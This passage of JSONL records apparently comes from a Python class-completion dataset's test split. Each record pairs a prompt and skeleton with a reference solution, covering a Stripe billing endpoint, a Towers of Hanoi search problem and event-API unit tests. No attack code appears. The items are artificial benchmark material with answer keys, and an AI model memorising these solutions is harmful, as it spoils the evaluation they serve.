stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n except Exception as e:\n abort(500, message=str(e))\n raise Unauthorized()\n<|end_body_0|>\n\n<|body_start_1|>\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n raise InvalidRequest()\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n return change_subscription(organization, price)\n raise Unauthorized()\n<|end_body_1|>\n\n<|body_start_2|>\n cus = None\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n private_repos = 
model.user.get_private_repo_count(orgname)\n organization = model.organization.get_organization(orgname)\n if organization.stripe_id:\n try:\n cus = billing.Customer.retrieve(organization.stripe_id)\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n if cus.subscription:\n return subscription_view(cus.subscription, private_repos)\n return {'hasSubscription': False, 'isExistingCustomer': cus is not None, 'plan': 'free', 'usedPrivateRepos': private_repos}\n raise Unauthorized()\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000288", "length_bytes": 33890, "license_type": "permissive", "methods": [{"docstring": "Create the org's subscription. Returns a Stripe checkout session.", "name": "post", "signature": "def post(self, orgname)"}, {"docstring": "Update the org's subscription.", "name": "put", "signature": "def put(self, orgname)"}, {"docstring": "Fetch any existing subscription for the org.", "name": "get", "signature": "def get(self, orgname)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005221", "prompt": "Implement the Python class `OrganizationPlan` described below.\n\nClass description:\nResource for managing a org's subscription.\n\nMethod signatures and docstrings:\n- def post(self, orgname): Create the org's subscription. Returns a Stripe checkout session.\n- def put(self, orgname): Update the org's subscription.\n- def get(self, orgname): Fetch any existing subscription for the org.", "prompted_full_text": "Implement the Python class `OrganizationPlan` described below.\n\nClass description:\nResource for managing a org's subscription.\n\nMethod signatures and docstrings:\n- def post(self, orgname): Create the org's subscription. Returns a Stripe checkout session.\n- def put(self, orgname): Update the org's subscription.\n- def get(self, orgname): Fetch any existing subscription for the org.\n\n<|skeleton|>\nclass OrganizationPlan:\n \"\"\"Resource for managing a org's subscription.\"\"\"\n\n def post(self, orgname):\n \"\"\"Create the org's subscription. 
Returns a Stripe checkout session.\"\"\"\n <|body_0|>\n\n def put(self, orgname):\n \"\"\"Update the org's subscription.\"\"\"\n <|body_1|>\n\n def get(self, orgname):\n \"\"\"Fetch any existing subscription for the org.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n success_url = request_data.get('success_url')\n cancel_url = request_data.get('cancel_url')\n if not success_url or not cancel_url:\n raise InvalidRequest()\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n try:\n cus = billing.Customer.create(email=organization.email)\n organization.stripe_id = cus.id\n organization.save()\n except stripe.error.APIConnectionError as e:\n return connection_response(e)\n try:\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n checkout_session = stripe.checkout.Session.create(line_items=[{'price': price['stripeId'], 'quantity': 1}], customer=organization.stripe_id, subscription_data={'metadata': {'kind': 'account_change_plan', 'namespace': organization.username, 'performer': get_authenticated_user().username, 'ip': get_request_ip(), 'plan': price['stripeId']}}, mode='subscription', success_url=success_url, cancel_url=cancel_url)\n return checkout_session\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n except Exception as e:\n abort(500, message=str(e))\n raise Unauthorized()\n<|end_body_0|>\n\n<|body_start_1|>\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n raise InvalidRequest()\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n return change_subscription(organization, price)\n raise Unauthorized()\n<|end_body_1|>\n\n<|body_start_2|>\n cus = None\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n private_repos = model.user.get_private_repo_count(orgname)\n organization = model.organization.get_organization(orgname)\n if organization.stripe_id:\n try:\n cus = billing.Customer.retrieve(organization.stripe_id)\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n if cus.subscription:\n return subscription_view(cus.subscription, private_repos)\n return {'hasSubscription': False, 'isExistingCustomer': cus is not None, 'plan': 'free', 'usedPrivateRepos': private_repos}\n raise Unauthorized()\n<|end_body_2|>\n", "revision_id": "e400a0c22c5f89dd35d571654b13d262b1f6e3b3", "skeleton": "<|skeleton|>\nclass OrganizationPlan:\n \"\"\"Resource for managing a org's subscription.\"\"\"\n\n def post(self, orgname):\n \"\"\"Create the org's subscription. Returns a Stripe checkout session.\"\"\"\n <|body_0|>\n\n def put(self, orgname):\n \"\"\"Update the org's subscription.\"\"\"\n <|body_1|>\n\n def get(self, orgname):\n \"\"\"Fetch any existing subscription for the org.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class OrganizationPlan:\n \"\"\"Resource for managing a org's subscription.\"\"\"\n\n def post(self, orgname):\n \"\"\"Create the org's subscription. 
Returns a Stripe checkout session.\"\"\"\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n success_url = request_data.get('success_url')\n cancel_url = request_data.get('cancel_url')\n if not success_url or not cancel_url:\n raise InvalidRequest()\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n try:\n cus = billing.Customer.create(email=organization.email)\n organization.stripe_id = cus.id\n organization.save()\n except stripe.error.APIConnectionError as e:\n return connection_response(e)\n try:\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n checkout_session = stripe.checkout.Session.create(line_items=[{'price': price['stripeId'], 'quantity': 1}], customer=organization.stripe_id, subscription_data={'metadata': {'kind': 'account_change_plan', 'namespace': organization.username, 'performer': get_authenticated_user().username, 'ip': get_request_ip(), 'plan': price['stripeId']}}, mode='subscription', success_url=success_url, cancel_url=cancel_url)\n return checkout_session\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n except Exception as e:\n abort(500, message=str(e))\n raise Unauthorized()\n\n def put(self, orgname):\n \"\"\"Update the org's subscription.\"\"\"\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n raise InvalidRequest()\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n return change_subscription(organization, price)\n raise Unauthorized()\n\n def get(self, orgname):\n \"\"\"Fetch any existing subscription for the org.\"\"\"\n cus = None\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n private_repos = model.user.get_private_repo_count(orgname)\n organization = model.organization.get_organization(orgname)\n if organization.stripe_id:\n try:\n cus = billing.Customer.retrieve(organization.stripe_id)\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n if cus.subscription:\n return subscription_view(cus.subscription, private_repos)\n return {'hasSubscription': False, 'isExistingCustomer': cus is not None, 'plan': 'free', 'usedPrivateRepos': private_repos}\n raise Unauthorized()\n", "source": "the_stack_v2_python_sparse", "source_path": "endpoints/api/billing.py", "source_repo": "quay/quay", "split": "test", "star_events_count": 2363} {"blob_id": "67fd831f1197a211997631f61c2245784e5b6891", "bodies": ["self.initial = initial\nif goal is not None:\n self.goal = goal\nelse:\n self.goal = sorted(self.initial[0], reverse=True)\nassert len(initial) == 3\nself.pegs = [i for i in range(0, len(initial))]\nself.sentinel = self.initial[0][0] + 1\nfor peg in self.initial:\n peg.insert(0, self.sentinel)\nself.goal.insert(0, self.sentinel)\nself.nodesTouched = 0\nself.largestFrontier = 0\nself.visited = dict()", "def check(action):\n \"\"\"Check to see if we'll end up in a loop by applying the action.\n \"\"\"\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n result[action.dest].append(value)\n if str(result) in self.visited:\n return False\n return True\nactions = []\ntops = [peg[-1] for peg in state]\nidxSmallest = 
tops.index(1)\nmoveSmallTo = list(self.pegs)\nmoveSmallTo.remove(idxSmallest)\nnextSmall = min(tops[moveSmallTo[0]], tops[moveSmallTo[1]])\nidxNextSmall = tops.index(nextSmall)\nfor move in moveSmallTo:\n action = Action(idxSmallest, move, 1)\n if check(action):\n actions.append(action)\nif nextSmall is self.sentinel:\n return actions\nelse:\n moveSmallTo.remove(idxNextSmall)\n assert len(moveSmallTo) == 1\n action = Action(idxNextSmall, moveSmallTo[0], nextSmall)\n if check(action):\n actions.append(action)\n return actions", "result = [peg[:] for peg in state]\nvalue = result[action.src].pop()\nassert value == action.value\nif value is self.sentinel:\n raise ValueError('Attempted to Move Sentinel Value')\nresult[action.dest].append(value)\nreturn result", "if state[0][-1] != self.sentinel:\n return False\nif state[2] == self.goal:\n return True\nreturn False"], "bodies_text": "<|body_start_0|>\n self.initial = initial\n if goal is not None:\n self.goal = goal\n else:\n self.goal = sorted(self.initial[0], reverse=True)\n assert len(initial) == 3\n self.pegs = [i for i in range(0, len(initial))]\n self.sentinel = self.initial[0][0] + 1\n for peg in self.initial:\n peg.insert(0, self.sentinel)\n self.goal.insert(0, self.sentinel)\n self.nodesTouched = 0\n self.largestFrontier = 0\n self.visited = dict()\n<|end_body_0|>\n\n<|body_start_1|>\n def check(action):\n \"\"\"Check to see if we'll end up in a loop by applying the action.\n \"\"\"\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n result[action.dest].append(value)\n if str(result) in self.visited:\n return False\n return True\n actions = []\n tops = [peg[-1] for peg in state]\n idxSmallest = tops.index(1)\n moveSmallTo = list(self.pegs)\n moveSmallTo.remove(idxSmallest)\n nextSmall = min(tops[moveSmallTo[0]], tops[moveSmallTo[1]])\n idxNextSmall = tops.index(nextSmall)\n for move in moveSmallTo:\n action = Action(idxSmallest, move, 1)\n if check(action):\n actions.append(action)\n if nextSmall is self.sentinel:\n return actions\n else:\n moveSmallTo.remove(idxNextSmall)\n assert len(moveSmallTo) == 1\n action = Action(idxNextSmall, moveSmallTo[0], nextSmall)\n if check(action):\n actions.append(action)\n return actions\n<|end_body_1|>\n\n<|body_start_2|>\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n assert value == action.value\n if value is self.sentinel:\n raise ValueError('Attempted to Move Sentinel Value')\n result[action.dest].append(value)\n return result\n<|end_body_2|>\n\n<|body_start_3|>\n if state[0][-1] != self.sentinel:\n return False\n if state[2] == self.goal:\n return True\n return False\n<|end_body_3|>\n", "class_docstring": "This is where the problem is defined. Initial state, goal state and other information that can be got from the problem", "class_name": "Problem", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Problem:\n \"\"\"This is where the problem is defined. Initial state, goal state and other information that can be got from the problem\"\"\"\n\n def __init__(self, initial, goal=None):\n \"\"\"This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises\"\"\"\n <|body_0|>\n\n def actions(self, state):\n \"\"\"Return the actions that can be executed in the given state. 
The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.\"\"\"\n <|body_1|>\n\n def result(self, state, action):\n \"\"\"Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).\"\"\"\n <|body_2|>\n\n def goal_test(self, state):\n \"\"\"Return True if the state is a goal. The default method compares the state to self.goal, as specified in the constructor. Override this method if checking against a single self.goal is not enough. This must be written by students\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.initial = initial\n if goal is not None:\n self.goal = goal\n else:\n self.goal = sorted(self.initial[0], reverse=True)\n assert len(initial) == 3\n self.pegs = [i for i in range(0, len(initial))]\n self.sentinel = self.initial[0][0] + 1\n for peg in self.initial:\n peg.insert(0, self.sentinel)\n self.goal.insert(0, self.sentinel)\n self.nodesTouched = 0\n self.largestFrontier = 0\n self.visited = dict()\n<|end_body_0|>\n\n<|body_start_1|>\n def check(action):\n \"\"\"Check to see if we'll end up in a loop by applying the action.\n \"\"\"\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n result[action.dest].append(value)\n if str(result) in self.visited:\n return False\n return True\n actions = []\n tops = [peg[-1] for peg in state]\n idxSmallest = tops.index(1)\n moveSmallTo = list(self.pegs)\n moveSmallTo.remove(idxSmallest)\n nextSmall = min(tops[moveSmallTo[0]], tops[moveSmallTo[1]])\n idxNextSmall = tops.index(nextSmall)\n for move in moveSmallTo:\n action = Action(idxSmallest, move, 1)\n if check(action):\n actions.append(action)\n if nextSmall is self.sentinel:\n return actions\n else:\n moveSmallTo.remove(idxNextSmall)\n assert len(moveSmallTo) == 1\n action = Action(idxNextSmall, moveSmallTo[0], nextSmall)\n if check(action):\n actions.append(action)\n return actions\n<|end_body_1|>\n\n<|body_start_2|>\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n assert value == action.value\n if value is self.sentinel:\n raise ValueError('Attempted to Move Sentinel Value')\n result[action.dest].append(value)\n return result\n<|end_body_2|>\n\n<|body_start_3|>\n if state[0][-1] != self.sentinel:\n return False\n if state[2] == self.goal:\n return True\n return False\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000289", "length_bytes": 21082, "license_type": "no_license", "methods": [{"docstring": "This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises", "name": "__init__", "signature": "def __init__(self, initial, goal=None)"}, {"docstring": "Return the actions that can be executed in the given state. The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.", "name": "actions", "signature": "def actions(self, state)"}, {"docstring": "Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).", "name": "result", "signature": "def result(self, state, action)"}, {"docstring": "Return True if the state is a goal. The default method compares the state to self.goal, as specified in the constructor. 
Override this method if checking against a single self.goal is not enough. This must be written by students", "name": "goal_test", "signature": "def goal_test(self, state)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_000461", "prompt": "Implement the Python class `Problem` described below.\n\nClass description:\nThis is where the problem is defined. Initial state, goal state and other information that can be got from the problem\n\nMethod signatures and docstrings:\n- def __init__(self, initial, goal=None): This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises\n- def actions(self, state): Return the actions that can be executed in the given state. The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.\n- def result(self, state, action): Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).\n- def goal_test(self, state): Return True if the state is a goal. The default method compares the state to self.goal, as specified in the constructor. Override this method if checking against a single self.goal is not enough. This must be written by students", "prompted_full_text": "Implement the Python class `Problem` described below.\n\nClass description:\nThis is where the problem is defined. Initial state, goal state and other information that can be got from the problem\n\nMethod signatures and docstrings:\n- def __init__(self, initial, goal=None): This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises\n- def actions(self, state): Return the actions that can be executed in the given state. The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.\n- def result(self, state, action): Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).\n- def goal_test(self, state): Return True if the state is a goal. The default method compares the state to self.goal, as specified in the constructor. Override this method if checking against a single self.goal is not enough. This must be written by students\n\n<|skeleton|>\nclass Problem:\n \"\"\"This is where the problem is defined. Initial state, goal state and other information that can be got from the problem\"\"\"\n\n def __init__(self, initial, goal=None):\n \"\"\"This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises\"\"\"\n <|body_0|>\n\n def actions(self, state):\n \"\"\"Return the actions that can be executed in the given state. The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.\"\"\"\n <|body_1|>\n\n def result(self, state, action):\n \"\"\"Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).\"\"\"\n <|body_2|>\n\n def goal_test(self, state):\n \"\"\"Return True if the state is a goal. 
The default method compares the state to self.goal, as specified in the constructor. Override this method if checking against a single self.goal is not enough. This must be written by students\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.initial = initial\n if goal is not None:\n self.goal = goal\n else:\n self.goal = sorted(self.initial[0], reverse=True)\n assert len(initial) == 3\n self.pegs = [i for i in range(0, len(initial))]\n self.sentinel = self.initial[0][0] + 1\n for peg in self.initial:\n peg.insert(0, self.sentinel)\n self.goal.insert(0, self.sentinel)\n self.nodesTouched = 0\n self.largestFrontier = 0\n self.visited = dict()\n<|end_body_0|>\n\n<|body_start_1|>\n def check(action):\n \"\"\"Check to see if we'll end up in a loop by applying the action.\n \"\"\"\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n result[action.dest].append(value)\n if str(result) in self.visited:\n return False\n return True\n actions = []\n tops = [peg[-1] for peg in state]\n idxSmallest = tops.index(1)\n moveSmallTo = list(self.pegs)\n moveSmallTo.remove(idxSmallest)\n nextSmall = min(tops[moveSmallTo[0]], tops[moveSmallTo[1]])\n idxNextSmall = tops.index(nextSmall)\n for move in moveSmallTo:\n action = Action(idxSmallest, move, 1)\n if check(action):\n actions.append(action)\n if nextSmall is self.sentinel:\n return actions\n else:\n moveSmallTo.remove(idxNextSmall)\n assert len(moveSmallTo) == 1\n action = Action(idxNextSmall, moveSmallTo[0], nextSmall)\n if check(action):\n actions.append(action)\n return actions\n<|end_body_1|>\n\n<|body_start_2|>\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n assert value == action.value\n if value is self.sentinel:\n raise ValueError('Attempted to Move Sentinel Value')\n result[action.dest].append(value)\n return result\n<|end_body_2|>\n\n<|body_start_3|>\n if state[0][-1] != self.sentinel:\n return False\n if state[2] == self.goal:\n return True\n return False\n<|end_body_3|>\n", "revision_id": "a283d50eff1d0e7c158479ddc8e17932d518104a", "skeleton": "<|skeleton|>\nclass Problem:\n \"\"\"This is where the problem is defined. Initial state, goal state and other information that can be got from the problem\"\"\"\n\n def __init__(self, initial, goal=None):\n \"\"\"This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises\"\"\"\n <|body_0|>\n\n def actions(self, state):\n \"\"\"Return the actions that can be executed in the given state. The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.\"\"\"\n <|body_1|>\n\n def result(self, state, action):\n \"\"\"Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).\"\"\"\n <|body_2|>\n\n def goal_test(self, state):\n \"\"\"Return True if the state is a goal. The default method compares the state to self.goal, as specified in the constructor. Override this method if checking against a single self.goal is not enough. This must be written by students\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Problem:\n \"\"\"This is where the problem is defined. 
Initial state, goal state and other information that can be got from the problem\"\"\"\n\n def __init__(self, initial, goal=None):\n \"\"\"This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises\"\"\"\n self.initial = initial\n if goal is not None:\n self.goal = goal\n else:\n self.goal = sorted(self.initial[0], reverse=True)\n assert len(initial) == 3\n self.pegs = [i for i in range(0, len(initial))]\n self.sentinel = self.initial[0][0] + 1\n for peg in self.initial:\n peg.insert(0, self.sentinel)\n self.goal.insert(0, self.sentinel)\n self.nodesTouched = 0\n self.largestFrontier = 0\n self.visited = dict()\n\n def actions(self, state):\n \"\"\"Return the actions that can be executed in the given state. The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.\"\"\"\n def check(action):\n \"\"\"Check to see if we'll end up in a loop by applying the action.\n \"\"\"\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n result[action.dest].append(value)\n if str(result) in self.visited:\n return False\n return True\n actions = []\n tops = [peg[-1] for peg in state]\n idxSmallest = tops.index(1)\n moveSmallTo = list(self.pegs)\n moveSmallTo.remove(idxSmallest)\n nextSmall = min(tops[moveSmallTo[0]], tops[moveSmallTo[1]])\n idxNextSmall = tops.index(nextSmall)\n for move in moveSmallTo:\n action = Action(idxSmallest, move, 1)\n if check(action):\n actions.append(action)\n if nextSmall is self.sentinel:\n return actions\n else:\n moveSmallTo.remove(idxNextSmall)\n assert len(moveSmallTo) == 1\n action = Action(idxNextSmall, moveSmallTo[0], nextSmall)\n if check(action):\n actions.append(action)\n return actions\n\n def result(self, state, action):\n \"\"\"Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).\"\"\"\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n assert value == action.value\n if value is self.sentinel:\n raise ValueError('Attempted to Move Sentinel Value')\n result[action.dest].append(value)\n return result\n\n def goal_test(self, state):\n \"\"\"Return True if the state is a goal. The default method compares the state to self.goal, as specified in the constructor. Override this method if checking against a single self.goal is not enough. 
This must be written by students\"\"\"\n if state[0][-1] != self.sentinel:\n return False\n if state[2] == self.goal:\n return True\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "4511W-Intro_To_Artificial_Intelligence/Course_Project_Towers_of_Hanoi/hanoi.py", "source_repo": "marvintv/apollo-academia-umn", "split": "test", "star_events_count": 0} {"blob_id": "6f11a93820d1f8f053b07934b0238a3ba8a4af93", "bodies": ["response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/searchtext?search=')\nevents = response.json()\nself.assertEqual(response.status_code, status.HTTP_200_OK)\nself.assertEqual(response.headers['Content-Type'], 'application/json')\nself.assertGreater(len(events), 1)", "response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/17012')\nevents = response.json()\nself.assertEqual(response.status_code, status.HTTP_200_OK)\nself.assertEqual(events['title'], 'SYSTEMS Coffee')"], "bodies_text": "<|body_start_0|>\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/searchtext?search=')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.headers['Content-Type'], 'application/json')\n self.assertGreater(len(events), 1)\n<|end_body_0|>\n\n<|body_start_1|>\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/17012')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(events['title'], 'SYSTEMS Coffee')\n<|end_body_1|>\n", "class_docstring": "", "class_name": "SamoaTests", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SamoaTests:\n\n def test_connection_to_samoa_api(self):\n \"\"\"Tests whether a connection to samoa is successful.\"\"\"\n <|body_0|>\n\n def test_17012_returns_systems_coffee(self):\n \"\"\"Tests whether the event with id 17012 returns the correct seminar.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/searchtext?search=')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.headers['Content-Type'], 'application/json')\n self.assertGreater(len(events), 1)\n<|end_body_0|>\n\n<|body_start_1|>\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/17012')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(events['title'], 'SYSTEMS Coffee')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000290", "length_bytes": 13057, "license_type": "permissive", "methods": [{"docstring": "Tests whether a connection to samoa is successful.", "name": "test_connection_to_samoa_api", "signature": "def test_connection_to_samoa_api(self)"}, {"docstring": "Tests whether the event with id 17012 returns the correct seminar.", "name": "test_17012_returns_systems_coffee", "signature": "def test_17012_returns_systems_coffee(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003678", "prompt": "Implement the Python class `SamoaTests` described below.\n\nClass description:\nImplement the SamoaTests class.\n\nMethod signatures and docstrings:\n- def test_connection_to_samoa_api(self): Tests whether a connection to samoa is successful.\n- def test_17012_returns_systems_coffee(self): Tests whether the event with id 17012 
returns the correct seminar.", "prompted_full_text": "Implement the Python class `SamoaTests` described below.\n\nClass description:\nImplement the SamoaTests class.\n\nMethod signatures and docstrings:\n- def test_connection_to_samoa_api(self): Tests whether a connection to samoa is successful.\n- def test_17012_returns_systems_coffee(self): Tests whether the event with id 17012 returns the correct seminar.\n\n<|skeleton|>\nclass SamoaTests:\n\n def test_connection_to_samoa_api(self):\n \"\"\"Tests whether a connection to samoa is successful.\"\"\"\n <|body_0|>\n\n def test_17012_returns_systems_coffee(self):\n \"\"\"Tests whether the event with id 17012 returns the correct seminar.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/searchtext?search=')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.headers['Content-Type'], 'application/json')\n self.assertGreater(len(events), 1)\n<|end_body_0|>\n\n<|body_start_1|>\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/17012')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(events['title'], 'SYSTEMS Coffee')\n<|end_body_1|>\n", "revision_id": "c8330258778dd7f71b1289c5dfe611e5637cf71d", "skeleton": "<|skeleton|>\nclass SamoaTests:\n\n def test_connection_to_samoa_api(self):\n \"\"\"Tests whether a connection to samoa is successful.\"\"\"\n <|body_0|>\n\n def test_17012_returns_systems_coffee(self):\n \"\"\"Tests whether the event with id 17012 returns the correct seminar.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SamoaTests:\n def test_connection_to_samoa_api(self):\n \"\"\"Tests whether a connection to samoa is successful.\"\"\"\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/searchtext?search=')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.headers['Content-Type'], 'application/json')\n self.assertGreater(len(events), 1)\n\n def test_17012_returns_systems_coffee(self):\n \"\"\"Tests whether the event with id 17012 returns the correct seminar.\"\"\"\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/17012')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(events['title'], 'SYSTEMS Coffee')\n", "source": "the_stack_v2_python_sparse", "source_path": "seminar-roulette/backend/tests.py", "source_repo": "olliegardner/seminar-roulette", "split": "test", "star_events_count": 0} {"blob_id": "5d5b6af451342ee167eadfd89e9e23079211da7d", "bodies": ["self.assertDirectoryContents(['produce.ini', 'Makefile'])\nwith self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('a.txt', 'b.txt', **{'-j': '3'})\nself.assertEqual(len(l.output), 4)\nself.assertDirectoryContents(['produce.ini', 'Makefile', 'a.txt', 'b.txt'])", "self.assertDirectoryContents(['produce.ini', 'Makefile'])\nwith self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('c.txt', 'd.txt', **{'-j': '3'})\nself.assertEqual(len(l.output), 2)\nself.assertDirectoryContents(['produce.ini', 'Makefile', 'c.txt', 'd.txt'])", "self.assertDirectoryContents(['produce.ini', 'Makefile'])\nwith self.assertLogs(logger='produce', level='INFO') as l:\n 
self.produce('e.txt', 'f.txt', **{'-j': '3'})\nself.assertEqual(len(l.output), 2)\nself.assertDirectoryContents(['produce.ini', 'Makefile', 'e.txt', 'f.txt'])", "self.assertDirectoryContents(['produce.ini', 'Makefile'])\nwith self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('g.txt', 'h.txt', 'i.txt', **{'-j': '3'})\nself.assertEqual(len(l.output), 2)\nself.assertDirectoryContents(['produce.ini', 'Makefile', 'g.txt', 'h.txt', 'i.txt'])"], "bodies_text": "<|body_start_0|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('a.txt', 'b.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 4)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'a.txt', 'b.txt'])\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('c.txt', 'd.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'c.txt', 'd.txt'])\n<|end_body_1|>\n\n<|body_start_2|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('e.txt', 'f.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'e.txt', 'f.txt'])\n<|end_body_2|>\n\n<|body_start_3|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('g.txt', 'h.txt', 'i.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'g.txt', 'h.txt', 'i.txt'])\n<|end_body_3|>\n", "class_docstring": "Tests the handling of recipes with multiple outputs.", "class_name": "MultipleOutputsTest", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MultipleOutputsTest:\n 